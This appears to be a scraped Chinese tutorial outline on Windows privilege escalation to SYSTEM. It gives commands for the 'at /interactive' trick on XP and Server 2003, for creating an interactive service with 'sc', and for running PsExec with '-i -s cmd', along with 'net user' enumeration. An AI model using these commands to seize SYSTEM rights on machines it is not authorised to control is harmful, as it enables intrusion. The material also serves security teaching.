- 一、Windows系统提权
- 1. 使用at提权
- 修改密码
- 查看系统用户
- 查看用户状态
- 查看用户进程
- 将user权限提升为system
- 关闭explorer
- 创建explorer
- 2. 使用 sc 提权 (适用于 Win7 及Windows server 2008 等高级版本)
- 3. 使用工具提权- Sysinternals Suite 套件
windows:
- user
- administrator
- system ——内核
Linux:
- user
- root
修改密码XP
Windows server 2003
net user查看系统用户
net user xxx *查看用户状态
net user xxx
查看用户进程
有很多system创建的服务进程
将user权限提升为systemcd at -? at 18:58 /interactive cmd #必须是未来时间,否则将是明天时间
关闭explorer
结果:桌面不可操作
创建explorer
发现权限变成system
2. 使用 sc 提权 (适用于 Win7 及Windows server 2008 等高级版本)
创建一个服务
默认是不启动的,可以去图形化界面自己启动
cd sc Create syscmd binPath= “cmd /K start” type= own type= interact sc start syscmd3. 使用工具提权- Sysinternals Suite 套件
载之后解压使用其中的 PsExec 放在C盘根目录
C:>PsExec.exe -i: 交互模式 -s: 使用系统账户 C:>psexec -i -s -d taskmgr C:>PsExec.exe -i -s cmd
